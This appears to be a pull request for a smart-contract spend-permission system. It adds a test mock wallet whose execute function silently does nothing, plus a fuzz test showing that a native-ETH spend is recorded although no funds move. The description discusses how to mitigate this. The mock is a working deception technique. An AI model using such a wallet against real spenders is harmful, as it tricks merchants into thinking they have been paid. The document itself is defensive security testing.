### PR TITLE
PoC for malicious user smartwallet with no-op `execute`

### DIFF
--- a/test/mocks/MockMaliciousCoinbaseSmartWallet.sol
+++ b/test/mocks/MockMaliciousCoinbaseSmartWallet.sol
@@ -1,0 +1,28 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.23;
+
+import {CoinbaseSmartWallet} from "smart-wallet/CoinbaseSmartWallet.sol";
+
+/// @dev Forked from official smart-wallet
+/// (https://github.com/coinbase/smart-wallet/blob/main/test/mocks/MockCoinbaseSmartWallet.sol).
+/// @dev WARNING! This mock is strictly intended for testing purposes only.
+/// Do NOT copy anything here into production code unless you really know what you are doing.
+contract MockMaliciousCoinbaseSmartWallet is CoinbaseSmartWallet {
+    constructor() {
+        // allow for easier testing
+        _getMultiOwnableStorage().nextOwnerIndex = 0;
+    }
+
+    function wrapSignature(uint256 ownerIndex, bytes memory signature)
+        public
+        pure
+        returns (bytes memory wrappedSignature)
+    {
+        return abi.encode(CoinbaseSmartWallet.SignatureWrapper(ownerIndex, signature));
+    }
+
+    function execute(address, uint256, bytes calldata) external payable virtual override onlyEntryPointOrOwner {
+        // maliciously do nothing
+        return;
+    }
+}

--- a/test/src/SpendPermissions/spend.t.sol
+++ b/test/src/SpendPermissions/spend.t.sol
@@ -12,16 +12,76 @@ import {ReturnsFalseToken} from "solady/../test/utils/weird-tokens/ReturnsFalseT
 import {SpendPermissionManager} from "../../../src/SpendPermissionManager.sol";
 
 import {SpendPermissionManagerBase} from "../../base/SpendPermissionManagerBase.sol";
+import {MockMaliciousCoinbaseSmartWallet} from "../../mocks/MockMaliciousCoinbaseSmartWallet.sol";
 
 contract SpendTest is SpendPermissionManagerBase {
     MockERC20 mockERC20 = new MockERC20("mockERC20", "TEST", 18);
     ReturnsFalseToken mockERC20ReturnsFalse = new ReturnsFalseToken();
     MockERC20MissingReturn mockERC20MissingReturn = new MockERC20MissingReturn("mockERC20MissingReturn", "TEST", 18);
+    MockMaliciousCoinbaseSmartWallet mockMaliciousCoinbaseSmartWallet = new MockMaliciousCoinbaseSmartWallet();
 
     function setUp() public {
         _initializeSpendPermissionManager();
-        vm.prank(owner);
+        vm.startPrank(owner);
         account.addOwnerAddress(address(mockSpendPermissionManager));
+
+        bytes[] memory owners = new bytes[](1);
+        owners[0] = abi.encode(owner);
+        mockMaliciousCoinbaseSmartWallet.initialize(owners);
+        mockMaliciousCoinbaseSmartWallet.addOwnerAddress(address(mockSpendPermissionManager));
+        vm.stopPrank();
+    }
+
+    function test_spend_succeeds_maliciousUserWallet(
+        address spender,
+        uint48 start,
+        uint48 end,
+        uint48 period,
+        uint160 allowance,
+        uint256 salt,
+        bytes memory extraData,
+        uint160 spend
+    ) public {
+        vm.assume(spender != address(0));
+        vm.assume(spender != address(mockMaliciousCoinbaseSmartWallet)); // otherwise balance checks can fail
+        assumePayable(spender);
+        vm.assume(start > 0);
+        vm.assume(end > 0);
+        vm.assume(start < end);
+        vm.assume(period > 0);
+        vm.assume(spend > 0);
+        vm.assume(allowance > 0);
+        vm.assume(allowance >= spend);
+        SpendPermissionManager.SpendPermission memory spendPermission = SpendPermissionManager.SpendPermission({
+            account: address(mockMaliciousCoinbaseSmartWallet),
+            spender: spender,
+            token: NATIVE_TOKEN,
+            start: start,
+            end: end,
+            period: period,
+            allowance: allowance,
+            salt: salt,
+            extraData: extraData
+        });
+        vm.deal(address(mockMaliciousCoinbaseSmartWallet), allowance);
+        vm.deal(spender, 0);
+        vm.prank(address(mockMaliciousCoinbaseSmartWallet));
+        mockSpendPermissionManager.approve(spendPermission);
+        vm.warp(start);
+
+        assertEq(address(mockMaliciousCoinbaseSmartWallet).balance, allowance);
+        assertEq(spender.balance, 0);
+        vm.prank(spender);
+        mockSpendPermissionManager.spend(spendPermission, spend);
+        assertNotEq(address(mockMaliciousCoinbaseSmartWallet).balance, allowance - spend); // balance didn't transfer!!
+        assertNotEq(spender.balance, spend); // balance didn't transfer!!
+        assertEq(address(mockMaliciousCoinbaseSmartWallet).balance, allowance); // original balances still there
+        assertEq(spender.balance, 0); // original balances still there
+        SpendPermissionManager.PeriodSpend memory usage = mockSpendPermissionManager.getCurrentPeriod(spendPermission); // usage
+            // was still recorded
+        assertEq(usage.start, start);
+        assertEq(usage.end, _safeAddUint48(start, period, end));
+        assertEq(usage.spend, spend);
     }
 
     function test_spend_revert_invalidSender(


### PR DESCRIPTION
This poc is based on a concern I saw in the Cantina issues but don’t see included in the final report. The concern is around the implementation of `execute` on the user’s smart wallet. The researcher pointed out that there’s no validation that the target being called actually is a Coinbase Smart Wallet – a malicious actor could create an implementation of a malicious contract that looks like a Coinbase Smart Wallet (passes signature validation etc.), but where the `execute` function doesn’t do anything but return success.  In this case, I’m trying to understand what a native ETH transfer would look like. I believe that it would appear to the spender that the transfer succeeded because the call to `spend` would not revert.  However, no ETH would have actually moved, and unless a spender is savvy enough to validate the balance change before dispensing the goods or service, they may believe they have been paid when they haven’t. At the very least, this might be something to call out in the documentation, since I also think that performing balance checks after sending ETH isn’t watertight (receiver might contain a hook that makes further transfers before the call returns?). The other potential suggestion made by the researcher would be to have a way to validate the bytecode of the target to ensure it’s the expected contract. This is also a burden that could be relegated to the spender instead of the SPM and would be protective against this type of attack, but again requires an awareness and adds some complexity.  This is no longer an issue for ERC20s since we use `safeTransferFrom` directly on the token contract as opposed to calling the user’s wallet. 